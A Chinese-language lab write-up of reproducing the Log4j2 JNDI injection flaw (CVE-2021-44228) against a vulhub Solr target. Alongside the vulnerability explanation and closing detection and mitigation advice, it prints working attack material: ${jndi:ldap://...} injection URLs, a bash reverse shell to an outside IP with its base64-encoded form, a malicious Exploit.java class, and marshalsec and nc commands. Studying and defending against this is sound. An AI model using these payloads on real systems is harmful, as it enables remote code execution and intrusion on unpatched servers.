根據這個大佬的文章進行學習的
https://blog.csdn.net/Bossfrank/article/details/130148819
一:漏洞概述
Log4j漏洞是由於Log4j 2在處理日誌訊息中的JNDI(Java Naming and Directory Interface)查詢時存在的不安全實現而引發的。攻擊者可以透過特製的日誌訊息利用此漏洞,從而使Log4j在處理日誌訊息時,連線到惡意的LDAP伺服器並執行任意程式碼。
二:漏洞原理
攻擊者構造payload,在JNDI介面lookup查詢進行注入,payload為${jndi:ldap:惡意url/poc},JNDI會去對應的服務(如LDAP、RMI、DNS、檔案系統、目錄服務…本例為ldap)查詢資源,由於lookup的出棧沒做限制,最終指向了攻擊者部署好的惡意站點,下載了遠端的惡意class,最終造成了遠端程式碼執行rce。
log4j2框架下的lookup查詢服務提供了{}欄位解析功能,傳進去的值會被直接解析。例如${java:version}會被替換為對應的java版本。這樣如果不對lookup的出棧進行限制,就有可能讓查詢指向任何服務(可能是攻擊者部署好的惡意程式碼)。
攻擊者可以利用這一點進行JNDI注入,使得受害者請求遠端服務來連結本地物件,在lookup的{}裡面構造payload,呼叫JNDI服務(LDAP)向攻擊者提前部署好的惡意站點獲取惡意的.class物件,造成了遠端程式碼執行(可反彈shell到指定伺服器)。
三:漏洞利用
攻擊者利用該漏洞的步驟如下:
- 構造惡意日誌訊息:攻擊者建立一個包含JNDI查詢請求的特製字串,例如
${jndi:ldap://attacker.com/a}。
- 日誌記錄:該字串被應用程式記錄到日誌中。
- JNDI查詢:Log4j在處理這條日誌訊息時,會解析JNDI查詢請求並嘗試連線到指定的LDAP伺服器。
- 惡意程式碼執行:如果LDAP伺服器返回一個惡意的Java類,Log4j將載入並執行該類中的程式碼,從而使攻擊者能夠在目標系統上執行任意程式碼。
lookup功能:
- Lookup 是一種查詢機制,用於動態獲取和替換日誌記錄中的變數或屬性的值。它提供了一種靈活的方式,可以在日誌訊息中引用、解析和插入各種上下文相關的資訊。
- log4j中除了sys解析器外,還有很多其他型別的解析器。其中,jndi 解析器就是本次漏洞的源頭
JNDI解析器:
-
JND全稱為Java命名和目錄介面,提供了命名服務和目錄服務,允許從指定的遠端伺服器獲取並載入物件,JNDI注入攻擊時常用的就是透過RMI和LDAP兩種服務。
-
正常的包含jndi的日誌記錄方式如下:
-
logger.info("system propety: ${jndi:schema://url}");
-
log4j2框架下的lookup查詢服務提供了{}欄位解析功能,傳進去的值會被直接解析。例如${java:version}會被替換為對應的java版本。這樣如果不對lookup的出棧進行限制,就有可能讓查詢指向任何服務(可能是攻擊者部署好的惡意程式碼)。
-
jdk將從url指定的路徑下載一段位元組流,並將其反序列化為Java物件,作為jndi返回。反序列化過程中,即會執行位元組流中包含的程式。
-
攻擊者如何控制伺服器上記錄的日誌內容呢?
-
大部分web服務程式都會對使用者輸入進行日誌記錄。例如:使用者訪問了哪些url,有哪些關鍵的輸入等,都會被作為引數送到log4j中,我們在這些地方寫上
${jndi:ldap://xxx.dnslog.cn}
就可以使web服務從xxx.dnslog.cn下載位元組流了。
ldap服務:
LDAP(輕型目錄訪問協議)是一個開放的,中立的,工業標準的應用協議,
透過IP協議提供訪問 控制和維護分散式資訊的目錄資訊。
目錄是一個為查詢、瀏覽和搜尋而最佳化的專業分散式資料庫,它呈 樹狀結構組織資料,就好象Linux/Unix系統中的檔案目錄一樣。
RMI:
RMI(遠端方法呼叫):它是一種機制,能夠讓在某個java虛擬機器上的物件呼叫另一個Java虛擬機器 的物件的方法。
四:漏洞復現
1、漏洞環境
啟動靶機
cd /vulhub-master/log4j/CVE-2021-44228
docker-compose up -d
遇到的問題
docker-compose up -d
拉取不了
- 報錯顯示
- 意思就是docker在守護程序連線的時候,TLs三次握手失敗,屬於是網路不行
一開始認為是DNS解析地址錯誤
找到地址解析檔案,修改為如下所示
重新拉取,失敗
然後,繼續百度找大佬解決問題
發現可以新增國內的加速服務,命令如下
首先需要建立daemon.json
vim /etc/docker/daemon.json建立並編輯,在複製下面程式碼
`{
點選檢視程式碼
`{
"registry-mirrors": ["https://registry.docker-cn.com","https://y4xpdpoy.mirror.aliyuncs.com"]
}`
然後重啟服務
systemctl restart docker
systemctl daemon-reload
成功拉取映象
2、訪問靶機
ip:8983訪問
訪問成功
3、登入網站dns回顯網站
http://ceye.io/
根據身份識別符號,構造payload,檢視cecy是否返回資料。
4、DNS回顯驗證
http://111.173.104.122:8983/solr/admin/cores?action=${jndi:ldap://w3caue.ceye.io}
成功回顯
5、反彈shell方法一之編寫惡意class檔案
1、編寫以下的惡意檔案Exploit.java
bash -i >& /dev/tcp/47.236.108.184/7777 0>&1
我們需要反彈shell到47.236.108.184的7777埠,所以命令這樣寫
2、然後對上述命令進行base64編碼,這裡給出一個網站,可以直接進行payload的編碼:https://ares-x.com/tools/runtime-exec
3、編碼結果為:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4yMzYuMTA4LjE4NC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}
4、然後可以寫惡意檔案了
點選檢視程式碼
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
public Exploit(){
try{
Runtime.getRuntime().exec("/bin/bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMzEvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}");
}catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Exploit e = new Exploit();
}
}
6、把編譯好的檔案放到攻擊機上
接下來,我們在攻擊機啟動LDAP服務。這裡使用工具marshalsec-0.0.3-SNAPSHOT-all.jar來快速開啟
https://www.cnblogs.com/cute-puli/p/14373826.html 工具教程
命令如下
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.36.161:7777/#Exploit" 1389
7、接著在攻擊機用nc監聽
nc -lvvp 7777
8、 最後一步,也是最關鍵的一步,進行JNDI注入,我們在注入點/solr/admin/cores?action構造一個JNDI注入如下:
${jndi:ldap://192.168.36.161:1389/Exploit}
完整的url為:
http://192.168.36.130:8983/solr/admin/cores?action=${jndi:ldap://192.168.36.161:1389/Exploit}
成功反彈shell
可以看到最後兩條日誌資訊,靶機已經透過GET方法請求了我們的惡意程式碼Exploit.class,狀態碼為200,成功響應,此時應該已經實現了RCE遠端程式碼執行。我們檢視對7777埠進行監聽的終端,成功獲取了shell:
6、反彈shell方法二之快捷工具
1、用到的工具為JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,地址為https://github.com/welk1n/JNDI-Injection-Exploit/releases
利用此工具即可不用編寫.class檔案,直接一鍵部署
2、然後我們利用JNDI注入工具把這個反彈shell命令部署到LDAP服務上去,在JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar所在目錄執行如下命令
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "構造反彈shell的命令的base64編碼" -A "攻擊機ip"
可以看到,這裡已經一鍵部署好了RMI和LDAP服務的站點,並給出了路徑,JDK1.8的版本為ldap://192.168.200.131:1389/Exploit
,JDK1.7的版本為:ldap://192.168.200.131:1389/Exploit7
3、然後用nc監聽
nc -lvvp 6666
4、構造pyload
http://192.168.36.130:8983/solr/admin/cores?action=${rmi:ldap://192.168.36.161:1099/Exploit}
5、成功反彈shell
6、最後關閉靶場
docker-compose down
復結結束
成果:瞭解到log4j2的原理及利用過程,以及知道了如何識別log4j2漏洞攻擊的特徵
如何排查是否受到了攻擊?
排查方法
檢查日誌中是否存在"jndi:ldap://"、"jndi:rmi//"等字元來發現可能的攻擊行為,前面復現的過程在payload的構造中都出現了這樣的字串,這是攻擊的典型標誌。
如何對log4j2的攻擊進行防禦?
1.設定log4j2.formatMsgNoLookups=True。相當於直接禁止lookup查詢出棧,也就不可能請求到訪問到遠端的惡意站點。
2.對包含有"jndi:ldap://"、"jndi:rmi//"這樣字串的請求進行攔截,即攔截JNDI語句來防止JNDI注入。
3.對系統進行合理配置,禁止不必要的業務訪問外網,配置網路防火牆,禁止系統主動外連網路等等。
4.升級log4j2元件到新的安全的版本。